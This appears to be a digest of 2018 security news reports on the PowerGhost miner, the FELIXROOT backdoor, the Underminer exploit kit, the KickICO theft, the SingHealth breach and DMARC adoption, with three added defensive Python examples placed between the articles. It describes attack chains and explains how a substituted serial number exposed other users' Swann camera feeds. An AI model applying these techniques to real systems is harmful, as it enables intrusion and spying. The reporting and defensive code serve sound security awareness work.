The victim system is infected remotely using exploits or remote administration tools (Windows Management Instrumentation). Experts discovered that during the infection phase a one-line PowerShell script is executed to fetch the core miner component and run it, with the entire process taking place in the system’s memory.

The first thing the malware does is check the command and control (C&C) server and, if a new version is available, download and execute it.

Then the malware uses the Mimikatz tool to obtain the user account credentials from the machine and uses them to attempt lateral movement inside the target network.

“Propagation. With the help of mimikatz, the miner obtains the user account credentials from the current machine, uses them to log on and attempts to propagate across the local network by launching a copy of itself via WMI. By “a copy of itself” here and below we mean the one-line script that downloads the miner’s body from the C&C.” continues the analysis.

“PowerGhost also tries to spread across the local network using the now-notorious EternalBlue exploit (CVE-2017-0144).”

Once it has infected a machine, PowerGhost attempts to escalate privileges using various exploits, such as the one for CVE-2018-8120.

In order to establish a foothold in the infected system, PowerGhost saves all its modules as properties of a WMI class, while the miner’s main body is saved as a one-line PowerShell script in a WMI subscription that activates every 90 minutes.

The script executes the miner by loading a PE file via reflective PE injection.

Most of the PowerGhost infections were observed in India, Brazil, Colombia, and Turkey.


Experts also discovered a PowerGhost version that implements DDoS capability, a circumstance that leads Kaspersky to believe the authors attempted to create a DDoS-for-hire service.

Further details, including Indicators of Compromise (IoCs) are reported in the analysis published by Kaspersky.


Stealthy Crypto-Miner Has Worm-Like Spreading Mechanism
30.7.2018 securityweek Cryptocurrency

The PowerGhost crypto-miner is capable of remaining undetected on infected systems, and can spread on its own by leveraging a fileless infection technique, Kaspersky Lab has discovered.

The miner is targeting both workstations and servers, which allows it to spread across large corporate networks. The threat, Kaspersky discovered, leverages the National Security Agency-linked EternalBlue exploit to spread.

The new threat proves once again that the growing popularity and rates of cryptocurrencies have driven cyber-criminals to adopt ingenious mining techniques and to gradually drop ransomware Trojans as the malware of choice in favor of crypto-miners.

PowerGhost is an obfuscated PowerShell script containing not only the malware’s core code, but also a series of add-on modules such as the miner and libraries required for the miner’s operation, Mimikatz, a module for reflective PE injection, and a shellcode for the EternalBlue exploit.

By employing multiple fileless techniques, the malware remains inconspicuous to the user and undetected by antivirus technologies, Kaspersky notes.

During infection, which is performed via exploits or remote administration tools (Windows Management Instrumentation), a one-line PowerShell script is executed to drop the miner’s body and immediately launch it, without writing it to the hard drive.

After that, the script, which is PowerGhost itself, checks the command and control (C&C) server and, if a new version is available, it fetches and runs it.

Mimikatz is used to get the user account credentials from the machine. Then, the malware logs on and attempts propagation on the local network by launching a copy of the initial script via WMI. The threat also attempts to spread leveraging the EternalBlue exploit (CVE-2017-0144).

After using Mimikatz and WMI to spread to a new machine, the malware also attempts to escalate privileges on the newly infected system using various exploits (including one for CVE-2018-8120).

All modules are saved as properties of a WMI class, while the miner’s body is saved as a one-line PowerShell script in a WMI subscription that activates every 90 minutes. The miner is launched via reflective PE injection.

One PowerGhost version also included the ability to launch distributed denial of service (DDoS) attacks, likely because its authors attempted to make extra money by offering DDoS services.

This DDoS function is the only one that copies files to the hard drive, and Kaspersky's security researchers believe it will be replaced with a fileless implementation in a future version of the malware. The researchers believe the DDoS function was added to the malware as an afterthought, because it is launched in a peculiar manner: the DDoS module and a function to launch it are downloaded and saved to disk separately.

To date, PowerGhost has mainly been observed within corporate local area networks and has mainly been encountered in India, Brazil, Colombia, and Turkey.


State of Email Security: What Can Stop Email Threats?
30.7.2018 securityweek Security

Neither Current Technology Nor Security Awareness Training Will Stop Email Threats

A survey of 295 professionals -- mostly but not entirely IT professionals -- has found that 85% of respondents see email threats bypass email security controls and make it into the inbox; 40% see weekly threats; and 20% have to take significant remediation action on a weekly basis.

Email security firm GreatHorn wanted to examine the state of email security today, nearly fifty years after email was first developed. Its findings (PDF) will not surprise security professionals. Breach analyses regularly conclude that more than 90% of all breaches start with an email attack. Indeed, the GreatHorn research shows that the majority (54.4%) of corporate security leaders (that is, those who hold the CISO role) consider email security to be a top 3 security priority.

What is surprising is not that email security is failing (almost half -- 46.1% -- of all respondents said they were less than 'satisfied' with their current email security solution), but the discrepancy in threat perception between the security professional respondents (comprising 61% of the sample) and the non-security respondents (the laypeople, comprising 39% of the sample).

"Sixty-six percent of all the people we interviewed said the only threat they saw in their inbox was spam," GreatHorn's CEO and co-founder Kevin O'Brien told SecurityWeek. "I suspect there is a little bit of a confluence of different things in this figure, and that when they say 'spam', they don't only mean unsolicited marketing emails. Nevertheless, it is a dismissal of the severity of the risk that email poses."

This figure changes dramatically when asked of the security professionals among the respondents. "When you narrow the interview stats to security professionals, less than 16% said that spam was the main threat they faced," he continued. "So, you have 85% of all security teams saying that there is a wide range of different kinds of threats that come in every single day via email -- but to the lay user, the only thing that ever goes wrong is that you get some email you don't want."

O'Brien also quoted statistics from Gartner email specialist Neil Wynne: "The email open rate for the average white-collar professional within the bounds of their work email is 100%," said O'Brien. "Whether or not you take any action in response to it, you will open the email."

It is true that you can open a malicious email and take no action whatsoever and you will remain safe. But that clearly doesn't happen. GreatHorn's figures show that 20% of the security professional respondents are forced into direct remediation from email threats (such as suspending compromised accounts, PowerShell scripts, resetting compromised third-party accounts, etc).

The implication, at a simplistic level, is that the average non-security member of staff is highly likely to open all emails; is not likely to expect anything other than spam (31% of the laypeople respondents said they never saw any email threats other than spam); and clearly -- from empirical proof -- will too often click on a malicious link or open a weaponized attachment.

Asked if a further implication from these figures is that security awareness training is failing, O'Brien said, "Yes." There are qualifications to this response, because phish training companies' built-in metrics clearly demonstrate an improvement in the click-through rates of users trained with their systems. Reductions in successful phishing from a 30% success rate to just 10% are not uncommon.

But, said O'Brien, "Verizon has reported that one in 25 people click on any given phishing attack." This suggests that for every 100 members of staff targeted by a phishing email, four will become victims -- and only one is necessary for a breach to occur.

The difficulty is the nature of modern email attacks. Many involve some form of impersonation, including BEC attacks, business spoofing attacks, and pure social engineering attacks from a colleague whose credentials have been acquired by the attacker. "You cannot train people to have awareness of an email threat when information about that threat is not visible to the user. There is very little functional way to train a user to differentiate between an email from a colleague and an email from someone who has stolen the colleague's credentials. So, we have a security awareness market that has used marketing to say that email security is an awareness problem, a people problem, and that you can train your way out of it. You cannot."

He added, "The reason that security awareness training companies are successful is because awareness training represents a tick in a compliance box that clears a company of gross negligence in the event they suffer a data breach." So, despite the fact it isn't really effective, you still need to do it.

GreatHorn's own view of the problem is that the solution must come from not just technology, nor simply people, but from using technology against the social engineering aspect of the threat -- that is, the content as well as the mechanics of the email.

Belmont, Mass-based GreatHorn announced a $6.3 million Series A funding round led by Techstars Venture Capital Fund and .406 Ventures in June 2017. It brings machine-learning technology to the continuing threat and problem of targeted spear phishing and the related BEC threat -- the latter of which, according to the FBI in May 2016, is responsible for losses "now totaling over $3 billion."


Office Vulnerabilities Chained to Deliver Backdoor
30.7.2018 securityweek Vulnerability Virus

A recently observed malicious campaign is abusing two chained Office documents, each exploiting a different vulnerability, to deliver the FELIXROOT Backdoor, FireEye reports.

The attack starts with a lure RTF document claiming to contain seminar information on environmental protection. When opened, it attempts to exploit CVE-2017-0199 to download a second stage payload, which is a file weaponized with CVE-2017-11882 (the Equation Editor vulnerability).

Upon successful infection, the FELIXROOT loader component is dropped onto the victim’s machine, along with an LNK file that points to %system32%\rundll32.exe. The LNK file, which contains the command to execute the loader component of FELIXROOT, is moved to the startup directory.

The embedded backdoor component, which is encrypted using custom encryption, is decrypted and loaded directly in memory. The malware has a single exported function.

Upon execution, the backdoor sleeps for 10 minutes, then it checks to see if it was launched by RUNDLL32.exe along with parameter #1. If so, it performs an initial system triage before launching command and control (C&C) network communications.

In addition to gathering a variety of system information, the malware also reads registry entries for potential administration escalation and proxy information.

Based on the commands received, the backdoor can fingerprint the infected machine, drop a file and execute it, launch a remote shell, terminate the connection to the C&C, download and run a batch script, download a file, and upload a file.

Communication with the C&C server is performed over HTTP and HTTPS. Sent data is encrypted using AES encryption and arranged in a custom structure.

The malware contains several commands for specific tasks. Once it has executed all tasks, it clears all the footprints from the targeted machine, by deleting the LNK file, created registry keys, and the dropper components.

“CVE-2017-0199 and CVE-2017-11882 are two of the more commonly exploited vulnerabilities that we are currently seeing. Threat actors will increasingly leverage these vulnerabilities in their attacks until they are no longer finding success, so organizations must ensure they are protected,” FireEye notes.


DMARC Fully Implemented by Half of U.S. Government Agencies
30.7.2018 securityweek Spam

More than half of U.S. government agencies have fully implemented the DMARC email security standard in response to a binding operational directive from the Department of Homeland Security, according to email threat protection company Agari.

The DHS issued the Binding Operational Directive (BOD) 18-01 in mid-October 2017, instructing all federal agencies to make plans and start using web and email security technologies such as HTTPS, STARTTLS and DMARC.

DMARC (Domain-based Message Authentication, Reporting and Conformance) is an email authentication, policy, and reporting protocol designed to detect and prevent email spoofing. Organizations can set the DMARC policy to “none” to only monitor unauthenticated emails, “quarantine” to send them to the spam or junk folder, or “reject” to completely block their delivery.

Agencies were given one year to fully implement DMARC (i.e. set their DMARC policy to “reject”).
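The three policy levels above, plus the reporting address and the percentage tag, are what an auditor like Agari reads out of each agency's `_dmarc` TXT record. The following Python classifier is an added example, not Agari's tooling or text from the directive: it parses records using the tag names of RFC 7489 and reports whether a domain has reached the "reject" target. The domain names and records are constructed, and treating `p=reject` with `pct` below 100 as incomplete enforcement is this example's own reading of "fully implemented".

```python
"""Classify DMARC records against the BOD 18-01 target of p=reject.

Added example, not Agari's tooling or the DHS directive's text. Tag names
follow RFC 7489; the sample records and domain names are constructed.
Treating p=reject with pct below 100 as incomplete enforcement is this
example's own interpretation of "fully implemented".
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class DmarcStatus:
    valid: bool                      # a usable v=DMARC1 record exists
    policy: Optional[str]            # p= tag: none / quarantine / reject
    subdomain_policy: Optional[str]  # sp= tag, defaults to p=
    pct: int                         # share of failing mail the policy applies to
    reporting: bool                  # rua= present, so spoofing attempts are reported
    full_reject: bool                # p=reject applied to 100% of mail
    notes: List[str] = field(default_factory=list)


def parse_dmarc(record: str) -> Dict[str, str]:
    """Split 'tag=value; tag=value' into a dict; tag names are case-insensitive."""
    tags: Dict[str, str] = {}
    for part in record.split(";"):
        if "=" not in part:
            continue
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    return tags


def classify(record: Optional[str]) -> DmarcStatus:
    """Map one _dmarc TXT record (or None when absent) to an enforcement status."""
    if record is None:
        return DmarcStatus(False, None, None, 0, False, False, ["no _dmarc TXT record"])
    tags = parse_dmarc(record)
    if tags.get("v", "").upper() != "DMARC1":
        return DmarcStatus(False, None, None, 0, False, False,
                           ["missing or invalid v=DMARC1; receivers ignore the record"])
    notes: List[str] = []
    policy: Optional[str] = tags.get("p", "").lower() or None
    if policy not in ("none", "quarantine", "reject"):
        notes.append("p= missing or invalid; the record is not actionable")
        policy = None
    subdomain_policy = tags.get("sp", "").lower() or policy
    try:
        pct = max(0, min(int(tags.get("pct", "100")), 100))
    except ValueError:
        pct = 100
        notes.append("pct= is not numeric; receivers default to 100")
    reporting = "rua" in tags
    if not reporting:
        notes.append("no rua= address: authentication failures are not reported to the owner")
    if policy == "reject" and pct < 100:
        notes.append(f"p=reject applies to only {pct}% of failing mail")
    if policy == "reject" and subdomain_policy != "reject":
        notes.append(f"subdomains fall back to sp={subdomain_policy}")
    full_reject = policy == "reject" and pct == 100
    return DmarcStatus(True, policy, subdomain_policy, pct, reporting, full_reject, notes)


# Constructed sample records, one per situation the report distinguishes.
SAMPLES: Dict[str, Optional[str]] = {
    "monitor.example.gov": "v=DMARC1; p=none; rua=mailto:dmarc@example.gov",
    "partial.example.gov": "v=DMARC1; p=reject; pct=50; rua=mailto:dmarc@example.gov",
    "enforced.example.gov": "v=DMARC1; p=reject; sp=reject; rua=mailto:dmarc@example.gov",
    "defensive.example.gov": "v=DMARC1; p=reject",  # parked domain, no reporting address
    "absent.example.gov": None,
}


def count_full_reject(samples: Dict[str, Optional[str]]) -> int:
    """How many domains meet the p=reject, 100% target."""
    return sum(classify(rec).full_reject for rec in samples.values())


if __name__ == "__main__":
    for domain, rec in SAMPLES.items():
        status = classify(rec)
        print(f"{domain:24} p={status.policy} pct={status.pct} "
              f"full_reject={status.full_reject} {status.notes}")
```

The `defensive.example.gov` record illustrates the point Agari makes about defensive domains: it counts as enforced, but a parked domain that never sends mail is the easy case, and without a `rua=` address its owner never sees the spoofing attempts the policy blocks.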

Agari has been monitoring more than 1,000 government domains to check their status. Shortly after the DHS issued the BOD, only 18% had implemented at least a minimal DMARC policy. By December 2017, nearly half had rolled out DMARC, but only 16% had set a “quarantine” or “reject” policy.

Agari’s latest report shows that 922 government-owned domains, representing 81% of the total, had enabled DMARC as of July 15. Nearly 600, representing 52%, have set a “reject” policy.

DMARC status in U.S. federal agencies

While this may seem like significant progress, Agari pointed out that two-thirds of the domains with a “reject” policy are “defensive domains,” which are not configured for sending email.

“Moving defensive domains to a DMARC enforcement policy is generally an easier process than moving active domains that send email, and also need to account for 3rd parties sending email on the agency’s behalf as well as specific mail servers permitted to send email,” Agari said in its report.

The company has determined that 28 agencies have fully protected all their domains. Some government organizations still have some unprotected assets, but they have secured a significant number of domains.

For example, the Department of Health and Human Services has enabled DMARC with a “reject” policy on 92 of its 118 domains, while the Department of Justice has done so for 65 of its 75 domains.

“To fully reach compliance with BOD 18-01, and to protect the federal government from phishing attacks, many more executive branch agencies must still implement ‘p=reject.’ But in comparison to the private sector, the U.S. Government should serve as a shining example for the implementation of common security standards,” Agari said.


KICKICO security breach – hackers stole over $7.7 million worth of KICK tokens
30.7.2018 securityaffairs Incident

ICO platforms are becoming a privileged target for hackers, the last victim in order of time is KickICO, a Blockchain crowdfunding website for ICO.
On Friday, KickICO disclosed a security breach: according to the platform, attackers accessed its wallets and stole over 70 million KICK tokens (roughly $7.7 million at the time).

The incident occurred on July 26 at 09:04 UTC; KickICO CEO Anti Danilevski explained that the staff learned of the security breach from victims who complained to the company.

KICKICO hack

“On July 26 at 9:04 (UTC) KICKICO has experienced a security breach, which resulted in the attackers gaining access to the account of the KICK smart contract — tokens of the KICKICO platform. The team learned about this incident after the complaints of several victims, who did not find tokens worth 800 thousand dollars in their wallets.” reads the data breach notification published by the company.

As of Friday, the company announced that the situation was under control and the smart contract had been restored. KickICO announced it will return all stolen KICK tokens to their legitimate owners and invited them to get in touch via email at report@kickico.com.

“KICKICO guarantees to return all tokens to KickCoin holders. We apologize for the inconveniences,” Danilevski said.

The company quickly started an investigation into the security breach; its internal staff discovered that the attackers had gained access to the private key of the KickICO platform used by the developers to manage the KICK token smart contract.

Once they had obtained the key, the attackers used it to destroy KICK tokens at approximately 40 addresses and to create the same amount of tokens at 40 other wallets under their control. With this trick the overall number of tokens did not change, so the security measures in place were not able to detect the fraudulent activity.

“The hackers gained access to the private key of the owner of the KickCoin smart contract. In order to hide the results of their activities, they employed methods used by the KickCoin smart contract in integration with the Bancor network: hackers destroyed tokens at approximately 40 addresses and created tokens at the other 40 addresses in the corresponding amount. In result, the total number of tokens in the network has not changed. ” continues the notification.
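The burn-and-mint swap described in the notification is invisible to a total-supply check but visible to a check that asks whether the owner key burned and minted equal totals across many addresses in a short window. The following Python is an added example, not KickICO's or Bancor's code: it runs both checks over a constructed event log. The all-zero address marking mints (as sender) and burns (as recipient) is an assumption borrowed from the ERC-20 Transfer event convention; the addresses and amounts are constructed.

```python
"""Flag privileged burn/mint swaps that leave a token's total supply unchanged.

Added example, not KickICO's or Bancor's code. It models the pattern in the
notification: tokens destroyed at roughly 40 addresses and an equal amount
created at 40 others, so a total-supply check stays green. The event log is
constructed; the all-zero address marking mint (from) and burn (to) follows
the ERC-20 Transfer convention, an assumption about how such tokens log them.
"""
from collections import defaultdict
from typing import Dict, List, Tuple

ZERO = "0x" + "0" * 40

# (block, tx_sender, from, to, amount): constructed sample log.
Event = Tuple[int, str, str, str, int]
EVENTS: List[Event] = [
    (100, "0xowner", "0xholderA", ZERO, 1_000),        # burn from a holder
    (100, "0xowner", "0xholderB", ZERO, 2_500),        # burn from a holder
    (101, "0xowner", ZERO, "0xnew1", 1_000),           # mint to a fresh address
    (101, "0xowner", ZERO, "0xnew2", 2_500),           # mint to a fresh address
    (150, "0xholderC", "0xholderC", "0xholderD", 40),  # ordinary transfer
    (160, "0xowner", ZERO, "0xholderE", 10),           # routine small mint
]


def supply_delta(events: List[Event]) -> int:
    """What a 'total supply unchanged' check sees: mints minus burns."""
    minted = sum(a for _, _, src, _, a in events if src == ZERO)
    burned = sum(a for _, _, _, dst, a in events if dst == ZERO)
    return minted - burned


def cluster_privileged(events: List[Event], window_blocks: int) -> List[Tuple[str, List[Event]]]:
    """Group mint/burn events per sender into clusters no more than window_blocks apart."""
    by_sender: Dict[str, List[Event]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e[0]):
        if ZERO in (ev[2], ev[3]):
            by_sender[ev[1]].append(ev)
    clusters: List[Tuple[str, List[Event]]] = []
    for sender, evs in by_sender.items():
        current = [evs[0]]
        for ev in evs[1:]:
            if ev[0] - current[-1][0] <= window_blocks:
                current.append(ev)
            else:
                clusters.append((sender, current))
                current = [ev]
        clusters.append((sender, current))
    return clusters


def find_burn_mint_swaps(events: List[Event], window_blocks: int = 10,
                         min_addresses: int = 3) -> List[dict]:
    """Alert when one sender burns and mints equal totals across many addresses in a short window."""
    alerts = []
    for sender, evs in cluster_privileged(events, window_blocks):
        burned = sum(a for _, _, _, dst, a in evs if dst == ZERO)
        minted = sum(a for _, _, src, _, a in evs if src == ZERO)
        touched = ({src for _, _, src, _, _ in evs if src != ZERO}
                   | {dst for _, _, _, dst, _ in evs if dst != ZERO})
        if burned and burned == minted and len(touched) >= min_addresses:
            alerts.append({
                "sender": sender,
                "blocks": (evs[0][0], evs[-1][0]),
                "amount": burned,
                "addresses": len(touched),
                "supply_delta": minted - burned,  # zero: the check that was relied on passes
            })
    return alerts


if __name__ == "__main__":
    print("supply delta over the whole log:", supply_delta(EVENTS))
    for alert in find_burn_mint_swaps(EVENTS):
        print("ALERT", alert)
```

The routine mint at block 160 is deliberately left unflagged: a single small mint with no matching burn is what a legitimate owner key does, and the alert condition (equal burned and minted totals, several distinct addresses, tight block window) is what separates the swap from it.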

Fortunately, the community quickly discovered the security breach and helped the platform mitigate it. KICKICO responded quickly and prevented further losses by replacing the compromised private key with another one associated with its cold storage.

Read more: https://cryptovest.com/news/kickico-suffered-77m-hack-attack-says-will-return-stolen-kicko-tokens/

“After the incident, the KICK token, listed on the 136th position on Coinmarketcap, has lost 1.87% in the last 24 hours. However, the move may be influenced by the bearish mood of the entire crypto market after the SEC rejected a Bitcoin ETF proposed by the Winklevoss twins.” reported the website cryptovest.com.


Massive Singapore Healthcare Breach Possibly Involved Contractor
30.7.2018 securityweek Incident

Researchers have come across two Pastebin posts that could shed more light on the data breach that resulted in the health records of 1.5 million Singaporeans getting stolen by hackers.

Authorities in Singapore announced on July 20 that a sophisticated threat actor had gained unauthorized access to a database of SingHealth, the city-state’s largest group of healthcare institutions.

The incident, described as Singapore’s biggest ever data breach, resulted in personal information and details on medication becoming compromised, but authorities said medical records, clinical notes and financial information were not affected.

The attackers are said to have used a malware-infected computer to access a SingHealth database between June 27 and July 4.

Singapore officials suggested – and independent cybersecurity experts confirmed – that the attack was likely carried out by a state-sponsored threat group, but they have refrained from publicly speculating on who might be behind the operation.

Trustwave has been monitoring the incident and the security firm is also convinced that the attack was launched by a nation-state actor.

“At this point, Trustwave SpiderLabs is not assigning attribution to a specific threat actor. We have strong suspicion but do not feel we have enough information to confirm attribution,” the company said.

Over the weekend, Trustwave published a blog post detailing its analysis of two files published by unknown individuals on code and text storage website Pastebin. While they have not been able to confirm it, researchers believe these files are somehow linked to the SingHealth breach and noted that they could provide important clues about how the attackers gained access to the data.

One of the files, an exception log from a Java server, posted to Pastebin on May 24, shows a query for delegating access to a SingHealth Headquarters (SHHQ) database from a senior manager in the Medical Technology Office of Singapore’s Health Services to an employee of CTC, a major IT contractor.

The delegation request was set for June 9 - 17 and it could mean that the attacker had hijacked the contractor’s user account and leveraged it to manipulate the SingHealth database. These dates show that the hackers may have conducted at least some reconnaissance activities weeks earlier than what Singapore officials reported.

The log file also shows that the target was a database named portaldev. “It is conceivable that the development environment server was not as well protected as the production server and therefore was an easier target,” Trustwave researchers said.

The security firm also discovered a series of SQL queries, targeting SingHealth medical data, uploaded to Pastebin on June 15. These queries suggest that whoever executed them was looking for sensitive information.

While it’s possible that the files were uploaded to Pastebin by developers working on the SingHealth database, they may have also been posted by the attacker, possibly to share code with collaborators for troubleshooting purposes, Trustwave explained.

“While we cannot know for certain if these findings are directly related to the SingHealth compromise, the combination of suspicious items occurring directly within the attack window are highly suspicious,” researchers said.


FELIXROOT Backdoor is back in a new fresh spam campaign
30.7.2018 securityaffairs Virus Spam

Security experts from FireEye have spotted a new spam campaign leveraging the FELIXROOT backdoor, a malware used in cyber espionage operations.
The FELIXROOT backdoor was first spotted by FireEye in September 2017, when attackers used it in attacks targeting Ukrainians.

The new spam campaign used weaponized documents claiming to provide information on a seminar on environmental protection efforts.

The documents include code to exploit known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary.

Experts reported that the lure documents used in the latest campaign were written in Russian. The weaponized document exploits the CVE-2017-0199 flaw to download a second-stage payload that triggers the CVE-2017-11882 vulnerability to drop and execute the final backdoor.

“FireEye recently observed the same FELIXROOT backdoor being distributed as part of a newer campaign. This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary on the victim’s machine.” reads the analysis published by FireEye.

“After successful exploitation, the dropper component executes and drops the loader component. The loader component is executed via RUNDLL32.EXE. The backdoor component is loaded in memory and has a single exported function,”

CVE-2017-0199 allows the attackers to download and execute a Visual Basic script containing PowerShell commands when the victim opens the lure document.

CVE-2017-11882 is a remote code execution vulnerability that allows the attacker to run arbitrary code in the context of the current user.

FELIXROOT backdoor

This backdoor implements a broad range of features, including target fingerprinting via Windows Management Instrumentation (WMI) and the Windows registry, remote shell execution, and data exfiltration.

Upon execution, the backdoor sleeps for 10 minutes, then it checks to see if it was launched by RUNDLL32.exe along with parameter #1.

If the backdoor was launched by RUNDLL32.exe with parameter #1, it performs an initial system triage before connecting to the command-and-control (C2) server. The malicious code uses Windows APIs to collect system information (i.e. computer name, username, volume serial number, Windows version, processor architecture and so on).

The FELIXROOT backdoor communicates with its command and control server via HTTP and HTTPS POST requests. The traffic to the C2 is encrypted with AES and then Base64-encoded.

“FELIXROOT communicates with its C2 via HTTP and HTTPS POST protocols. Data sent over the network is encrypted and arranged in a custom structure. All data is encrypted with AES, converted into Base64, and sent to the C2 server” continues the analysis.

“Strings in the backdoor are encrypted using a custom algorithm that uses XOR with a 4-byte key.”
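A 4-byte XOR key is the kind of obfuscation an analyst strips during triage, and when the key is not handed to you, a string you expect to be present (the page itself names `rundll32.exe`) is enough to recover it. The following Python is an added example, not FireEye's analysis code or FELIXROOT's own routine: the analysis states only that strings are XORed with a 4-byte key, so the repeating-key layout, the NUL-separated string table, the sample key and the sample strings are constructed assumptions used to show the technique end to end.

```python
"""Repeating 4-byte XOR string decoding, with key recovery from a known plaintext.

Added example, not FireEye's analysis code or FELIXROOT's own routine. The
analysis says only that strings are XORed with a 4-byte key; the repeating-key
layout, NUL-separated string table, sample key and sample strings below are
constructed assumptions so the technique can be shown end to end.
"""
from itertools import cycle
from typing import List


def xor_4byte(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating 4-byte key; the operation is its own inverse."""
    if len(key) != 4:
        raise ValueError("key must be exactly 4 bytes")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def looks_like_text(data: bytes) -> bool:
    """Printable ASCII plus NUL/tab/CR/LF, the shape of a decoded string table."""
    return all(32 <= c < 127 or c in (0, 9, 10, 13) for c in data)


def recover_keys(blob: bytes, known: bytes) -> List[bytes]:
    """Derive candidate keys by assuming `known` appears somewhere in the plaintext.

    For each offset, the key byte for slot (offset + i) % 4 must equal
    blob[offset + i] ^ known[i]; a consistent assignment covering all four
    slots is a candidate, kept only if it decodes the whole blob to text.
    """
    if len(known) < 4:
        raise ValueError("need at least 4 known plaintext bytes to fix every key slot")
    candidates: List[bytes] = []
    for offset in range(len(blob) - len(known) + 1):
        key = bytearray(4)
        seen = [False] * 4
        consistent = True
        for i, p in enumerate(known):
            slot = (offset + i) % 4
            kb = blob[offset + i] ^ p
            if seen[slot] and key[slot] != kb:
                consistent = False
                break
            key[slot], seen[slot] = kb, True
        if consistent and all(seen):
            candidate = bytes(key)
            if candidate not in candidates and looks_like_text(xor_4byte(blob, candidate)):
                candidates.append(candidate)
    return candidates


def decode_table(blob: bytes, key: bytes) -> List[str]:
    """Decode a NUL-separated string table into its strings."""
    return [s.decode("ascii") for s in xor_4byte(blob, key).split(b"\x00") if s]


# Constructed sample: a tiny string table and key standing in for the real ones.
SAMPLE_KEY = b"\x5a\xc3\x17\x9e"
SAMPLE_STRINGS = [r"rundll32.exe", r"Software\Classes\Applications", "/upload"]
SAMPLE_BLOB = xor_4byte(b"\x00".join(s.encode("ascii") for s in SAMPLE_STRINGS) + b"\x00",
                        SAMPLE_KEY)

if __name__ == "__main__":
    # An analyst expects the loader name to appear somewhere in the table.
    for key in recover_keys(SAMPLE_BLOB, b"rundll32"):
        print(key.hex(), decode_table(SAMPLE_BLOB, key))
```

`recover_keys` returns a list rather than a single key because a wrong offset can occasionally produce a key that still decodes to printable text; the analyst discards those by reading the output, which is why the printable filter is a screen and not a proof.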

The experts believe that this backdoor is a dangerous threat but was involved at the time in massive campaigns.

The FELIXROOT backdoor contains several commands that allow it to execute specific tasks. After executing a command, the malicious code waits for one minute before executing the next one.

“Once all the tasks have been executed completely, the malware breaks the loop, sends the termination buffer back, and clears all the footprints from the targeted machine” continues FireEye.

Deletes the LNK file from the startup directory.
Deletes the registry key HKCU\Software\Classes\Applications\rundll32.exe\shell\open
Deletes the dropper components from the system.

Further details, including the IoCs, are reported in the analysis published by FireEye.


Underminer Exploit Kit spreading Bootkits and cryptocurrency miners
30.7.2018 securityaffairs Cryptocurrency

New Underminer exploit kit delivers a bootkit that infects the system’s boot sectors as well as a cryptocurrency miner dubbed Hidden Mellifera.
Malware researchers from Trend Micro have spotted a new exploit kit, tracked as Underminer exploit kit, delivering a bootkit that infects the system’s boot sectors as well as a cryptocurrency miner dubbed Hidden Mellifera.

“We discovered a new exploit kit we named Underminer that employs capabilities used by other exploit kits to deter researchers from tracking its activity or reverse engineering the payloads.” reads the analysis published by TrendMicro.

“Underminer delivers a bootkit that infects the system’s boot sectors as well as a cryptocurrency-mining malware named Hidden Mellifera.”

Researchers first noticed Underminer activity on July 17, while it was distributing the payloads mainly to Asian countries, mostly Japan (69.75%) and Taiwan (10.52%).

Underminer transfers the malicious payloads via an encrypted transmission control protocol (TCP) tunnel and packages malicious files in a customized format similar to the ROM file system format (romfs). According to the experts, this makes the malicious code difficult to analyze.

The Underminer exploit kit appears to have been created in November 2017, when it only included code for the exploitation of Flash vulnerabilities and used fileless payloads to deliver and execute the malware.

The Underminer EK includes functionalities also employed by other exploit kits, including:

browser profiling and filtering;
preventing of client revisits;
URL randomization;
asymmetric encryption of payloads.

The EK redirects visitors to a landing page that profiles the user’s Adobe Flash Player version and detects the browser type via the user-agent.

If the visitor’s profile does not match that of a target of interest, the exploit kit does not deliver malicious content and redirects the visitor to a clean website.

The Underminer exploit kit also sets a token in the browser cookie; if the victim has already accessed the landing page, it delivers only an HTTP 404 error message instead of the payloads.

Researchers discovered that the Underminer exploit kit still includes a small number of exploits. The experts have spotted the code to trigger the following vulnerabilities:

CVE-2015-5119, a use-after-free vulnerability in Adobe Flash Player patched in July 2015.
CVE-2016-0189, a memory corruption vulnerability in Internet Explorer (IE) patched in May 2016.
CVE-2018-4878, a use-after-free vulnerability in Adobe Flash Player patched in February 2018.
All the above flaws have been exploited by other EKs in the past.

Below is the infection flow of Underminer’s exploits as described by Trend Micro.

Underminer modus operandi

“Like other exploits before it, we expect Underminer to hone their techniques to further obfuscate the ways they deliver their malicious content and exploit more vulnerabilities while deterring security researchers from looking into their activities. And given the nature of their operations, we also expect them to diversify their payloads.” concludes Trend Micro.


Security bug in Swann IoT Camera allowed access to video feeds
30.7.2018 securityaffairs IoT

Security experts have discovered a security glitch in Swann IoT camera that could be exploited by attackers to access video feeds.
Security experts from Pen Test Partners (Andrew Tierney, Chris Wade and Ken Munro), along with security researchers Alan Woodward, Scott Helme and Vangelis Stykas, have discovered a security flaw in the Swann IoT camera that could be exploited to access video feeds.

The experts reported the issue to the vendor, which has patched the vulnerability.

The research team developed a proof-of-concept attack exploiting security flaws in the cloud service used by the IoT camera, Safe by Swann; in this way they were able to access the cameras from their mobile devices.

The experts started investigating the issue after reading a BBC article outlining how a BBC employee had accidentally seen someone else’s footage on the mobile app for their home security camera.

The affected camera model is a battery-powered HD camera that streams video either directly over the local network or via a cloud service.

Swann IoT camera

Experts noticed that the cloud service is provided by Ozvision: when a user logs into the system through Safe by Swann, a request (userListAssets) is made to the server.

The server, in turn, provides a list containing the devices associated with the account.

The researchers analyzed the requests and attempted to manipulate the serial number parameter.

Swann IoT camera request

The experts explained that it is easy to find a serial number associated with the targeted device via the API endpoint and APK.

“After reviewing the API endpoint and APK, I quickly realised that the serial number (swnxxxxxxxxx) is the primary identifier of the camera on the platform. This is both for the Swann-specific web API and the OzVision peer-to-peer tunnel. The serial is easily found in the mobile app:” states the analysis published by the experts.

“We replace the serial number (deviceid) in the response from the server. At this point the mobile app sees the details of someone else’s camera. We are using Charles here, but Burp or MITMproxy will do it too”

The experts demonstrated that it is possible to access the camera stream for another serial number.

“In the app, one simply presses ‘play’. This made a request to deviceWakeup using the modified serial, then the Ozvision tunnel to the device was established using the modified serial. We could then watch the camera live.” continues the experts.

